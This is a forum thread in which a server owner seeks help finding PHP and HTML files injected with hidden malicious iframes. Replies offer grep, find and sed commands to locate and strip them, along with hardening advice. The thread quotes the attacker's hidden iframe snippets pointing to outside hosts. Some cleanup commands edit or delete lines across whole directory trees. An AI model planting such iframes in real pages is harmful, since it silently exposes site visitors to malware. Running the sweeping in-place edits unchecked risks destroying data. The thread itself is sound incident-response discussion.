Results 1 to 17 of 17
  1. #1
    Join Date
    Jun 2004
    Posts
    135

    How to find out hacked files on server?

    My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.

    HTML Code:
    <iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
    /iframe>
    The inserted iframe src is not the same among the hacked files.

    I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
    My English is poor. Please tell me when I make a mistake so that I can improve.

  2. #2
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    Search for iframe within html and php files. They may not all be hacks -- there are legitimate uses for iframe -- but its a good start.

    However unless you stop the source, you will just end up with more. There have been many threads on this lately here.
    “Even those who arrange and design shrubberies are under
    considerable economic stress at this period in history.”

  3. #3
    Join Date
    Jun 2004
    Posts
    135
    Quote Originally Posted by mwatkins View Post
    Search for iframe within html and php files. They may not all be hacks -- there are legitimate uses for iframe -- but its a good start.

    However unless you stop the source, you will just end up with more. There have been many threads on this lately here.
    Yes, you are right, but how can I search for the codes in all the files on my server? Can we have any shell command to do it?
    My English is poor. Please tell me when I make a mistake so that I can improve.

  4. #4
    This seems to iframe insertion attack.


    I suggest you to upload files from backup as searching manually will not be possible.

    And make sure you give 755 permissions to directories and 644 to files to avoid such issues in future.

  5. #5
    Join Date
    Jun 2004
    Posts
    135
    I was trying to find the infected files with the following command.

    find * | xargs grep 'http://a5g.ru:8080'

    But the results are showing on screen and I am not able to read them all, can I have some refinement on the command?
    My English is poor. Please tell me when I make a mistake so that I can improve.

  6. #6

    Remove infected .php, .html, .htm files

    Try the commands below to locate the infected files.
    ===================================================

    • find / -perm 766 -exec ls -al {} \; | grep "Aug 21" > files766.txt
    • find / -perm 666 -exec ls -al {} \; | grep "Aug 21" > files666.txt
    • find / -perm 777 -exec ls -al {} \; | grep "Aug 21" > files777.txt


    Note : Replace the date " Jul 9" with the date your account was hacked.

    OR

    Try the command mentioned below :
    ============================

    • find /home -name '*.php' -o -name '*.htm*' | xargs grep -l iframe /dev/null


    OR

    Try the command mentioned below :
    ============================

    #!/bin/bash

    • find / -type f -name *.php -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;
    • echo "Removed Tag from PHP file"

    • find / -type f -name *.html -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;
    • echo "Removed Tag from HTML file"


    • find / -type f -name *.htm -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;
    • echo "Removed Tag from ALL files"


    • echo "Server Administrator"
    • exit

  7. #7
    Join Date
    Mar 2009
    Location
    Near You..
    Posts
    81
    Quote Originally Posted by KennyP View Post
    My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.

    HTML Code:
    <iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
    /iframe>
    The inserted iframe src is not the same among the hacked files.

    I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
    First block the IP address 87.242.98.116 in firewall to reduce chaces of further infection. Change your FTP password, as well as that of other accounts that may be using the same password.

    Search your webpages using grep for strings like "document.write(unescape(" OR other notable string that you can detect on the affected page.

    Check whether there has been any uploads or changes in the account that you did not do by yourslef.

    Run clamscan on the accounts home dir /home/username.
    Last edited by timelead129; 07-10-2009 at 04:53 AM.

  8. #8
    Join Date
    Jun 2004
    Posts
    135
    Quote Originally Posted by timelead129 View Post
    First block the IP address 87.242.98.116 in firewall to reduce chaces of further infection. Change your FTP password, as well as that of other accounts that may be using the same password.

    Search your webpages using grep for strings like "document.write(unescape(" OR other notable string that you can detect on the affected page.

    Check whether there has been any uploads or changes in the account that you did not do by yourslef.

    Run clamscan on the accounts home dir /home/username.
    More files are infected now, can you show me how to block the IP? I have a cPanel server here.
    My English is poor. Please tell me when I make a mistake so that I can improve.

  9. #9
    Join Date
    Jun 2004
    Posts
    135
    The hacker is doing more on my server now, I have no idea on how to stop him, anyone can help me?
    My English is poor. Please tell me when I make a mistake so that I can improve.

  10. #10
    Join Date
    Apr 2007
    Location
    US, UK, Europe, ME
    Posts
    258
    Quote Originally Posted by Nelesh O View Post
    Try the commands below to locate the infected files.
    ===================================================

    • find / -perm 766 -exec ls -al {} \; | grep "Aug 21" > files766.txt
    • find / -perm 666 -exec ls -al {} \; | grep "Aug 21" > files666.txt
    • find / -perm 777 -exec ls -al {} \; | grep "Aug 21" > files777.txt


    Note : Replace the date " Jul 9" with the date your account was hacked.

    OR

    Try the command mentioned below :
    ============================

    • find /home -name '*.php' -o -name '*.htm*' | xargs grep -l iframe /dev/null


    OR

    Try the command mentioned below :
    ============================

    #!/bin/bash

    • find / -type f -name *.php -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;
    • echo "Removed Tag from PHP file"


    • find / -type f -name *.html -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;
    • echo "Removed Tag from HTML file"


    • find / -type f -name *.htm -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;
    • echo "Removed Tag from ALL files"


    • echo "Server Administrator"
    • exit
    Use the find utility as mentioned above. Also you should notify your admin to investigate this for you, This is not the proper time to train yourself, it's important to find the source of the attack and lock it down. If you don't have a sys admin, Then, this is the time to get an experienced one, Your server may becomes compromised, if it's not.

    Regards,

  11. #11
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581

    How to remove an iframe

    Hi ,

    Please use the following script
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5g.ru" {} \; -exec sed -i "/"a5g.ru"/d" {} \;
    ===============

    The above command will remove the line which contains the word " a5g.ru " . The command will search all the files under /home

    We are advising you to take necessary backups before running the above script.


    The basic steps that is to be done to prevent this type of attack in future are

    1) Scan your server periodically and check for rootkits and vulnerablilities.

    2) Update all the 3rd party softwares to the latest version

    3) Make sure your ftp paswords are updated

    4) Ensure that appropriate file permissions are used for every file and directory on the web server
    Last edited by supportexpertz; 07-10-2009 at 07:39 AM.
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  12. #12
    Join Date
    Apr 2004
    Location
    Germany
    Posts
    37
    How to find out hacked files on server?
    This is, of course, a question that matters now. However, you seem to be doing the second step before the first.

    Your server is compromised. At this time it is unclear whether the compromise is limited to an unpriviliged or not (i.e. whether the root account is compromised, too).

    You state that the attacker (which is most likely not a real person but some script which is executed on many compromised servers such as yours at the same time) is still making modifications to your web pages. As such, the attacker is still having control over parts or all of your server.

    The first thing you need to do now is to prevent this from continuing.

    I recommend that you take notes of all actions you take, including time and date. This way you will be able to roll back any revertable changes you make now.

    If you have remote access through a serial console to your server, then disable the network interface now and examine the situation through the serial console.

    Alternatively, if you have KVM access, do the same.

    If you have neither remote serial console nor KVM access then use either iptables firewalling or hosts.allow/hosts.deny to limit access to your server to incoming connections from another server you manage. Disabling the web and FTP servers is another option but may well be insufficient to lock the attacker out (they may have a backdoor installed which comes with its own server process and will still function after you took down the web and FTP server).

    If this seems to complicated, contact your ISP/hosting provider, they will be able and want to help you out (it is in their interest, too).

    Now notify your clients that an unplanned outage has occured and make an ETA based on how long you think it will take you to follow the steps outlined below.

    Once this is done, you should investigate how the attacker was able to intrude the system and when. And once that is clear, you should revert to the most recent backup which was made before the attacker ganed access to your system.

    If this is not an option, you can also try to find out which alterations the attacker has made and to try to revert them. This is, howeever, unsafe, since you can not be sure that there have not been additional alterations made which you are not aware of.

    Only after you are completely convinced that you have both removed the vulnerability the attacker used to compromise your system and the alterations they made, reenable network access to your system and inform your clients/users what has happened and how you reacted to it.

  13. #13
    Join Date
    Jun 2004
    Posts
    135
    By using the provided scripts, I think I have temporary removed the infected files on server.

    I have to investigate the source and take necessary prevention now, the advices by mnaumann are great enough but I am not able to take down the server, as downtime mean a big loss to me.

    I think I should hire a system admin to solve the problem, as mentioned by Sys Admin, this is not a time for tranning myself.

    How can I find a reliable system admin on Internet? Is there any place to find the expert?
    My English is poor. Please tell me when I make a mistake so that I can improve.

  14. #14
    Join Date
    Apr 2004
    Location
    Germany
    Posts
    37
    Sure, just post a request in the Systems Management Requests forum.
    Last edited by mnaumann; 07-12-2009 at 06:29 AM. Reason: added URL

  15. #15
    Join Date
    May 2009
    Posts
    31
    You can use the following script for search and replace iframe

    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5g.ru" {} \; -exec sed -i "/"a5g.ru"/d" {} \;

    You can install mod_security and add sec2 rules from gotroot rules for avoiding further injection and malware attacks.

  16. #16
    Join Date
    Mar 2009
    Location
    Chicago, IL
    Posts
    219
    I see it touched on a bit, but no one in this thread really goes into finding the source of the attack moreso than trying to recover from the effects of it. Think about it as if you were trying to remove a branch from a thorn three and you keep getting stabbed by the thorns. Would you keep putting band aids on your hands to stop the bleeding and try again? No, you'd fix the problem at it's root and get a pair of gloves.

    First and foremost, chances are you have 1. Insecure scripts that are being exploited. 2. Insecure FTP passwords that are being exploited.

    Now if these iframe insertions are happening through different user accounts, we can probably rule out Upload/modification via FTP (possibly). Chances are you've got an old insecure php script somewhere that's being exploited.

    If this is a cPanel machine, the first thing I'd do is run '/scripts/phpopenbasedirctl on' , More than likely this is a PHP script that's being exploited, and this will force the attacker/script owner to stay within the confines of the homedirectory that's being exploited. So you'll effectively limit this to one site.

    Next up, if you're not running suPHP, you should be. You can fix this via Easyapache (once again, assuming cPanel here). This will further help mitigate the damage a single hacked site can do. It'll also leave a trail as any files this user creates, will be owned by the hacked site.

    Now, you can either a: wait for it to happen again and run the permissions trail back down to the offending site and from there go through their access logs and look for very obviously suspect traffic. It should really jump out at you. or b: Apply a *proper* mod_security ruleset as mentioned above, however you should REALLY prune out all the unnecessary signatures as those rulesets are meant to block *everything* and add a ton of overhead to Apache. No point in filtering Windows only exploits when you're running a linux server, etc.

    And as per the usual, if you keep running into this, you should look into hiring an admin to take a look through and sort this out for you. A good admin should be able to find the point of intrusion and kill it in about 30 minutes to an hour at most.

  17. #17
    Join Date
    Apr 2009
    Posts
    839
    hello,

    you can use something like this to check files:

    grep -R a5g * |awk -F: '{print $1}'

    this will print you a list of all affected files.

    However it is better to use find script to replace that lines, and be sure to change all of your ftp passwords. 90% that they have been stolen from your total commander of far manager or etc. from your local computer via some virus. Better change all of your passwords and be sure not to check 'Save/Remember password' option in any program.


    Injection also possible in old versions of CMSes like joomla and wordpress.

    Hope this helps.

Similar Threads

  1. windows server hacked and files transferred using torrent clients
    By prashant1979 in forum Hosting Security and Technology
    Replies: 25
    Last Post: 01-22-2008, 03:17 AM
  2. Server hacked : how can I find out how they are uploading files to my server?
    By listenmirndt in forum Hosting Security and Technology
    Replies: 4
    Last Post: 04-14-2007, 12:44 PM
  3. Server Repeatedly hacked - writes and executes files from /tmp
    By hostchamp in forum Hosting Security and Technology
    Replies: 182
    Last Post: 01-30-2004, 10:57 AM
  4. Find all files per type on a server???
    By VanHost in forum Hosting Security and Technology
    Replies: 3
    Last Post: 10-03-2003, 07:54 PM
  5. How can i find any filesize limits files on my server?
    By astraler2k in forum Hosting Security and Technology
    Replies: 4
    Last Post: 08-11-2002, 12:14 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •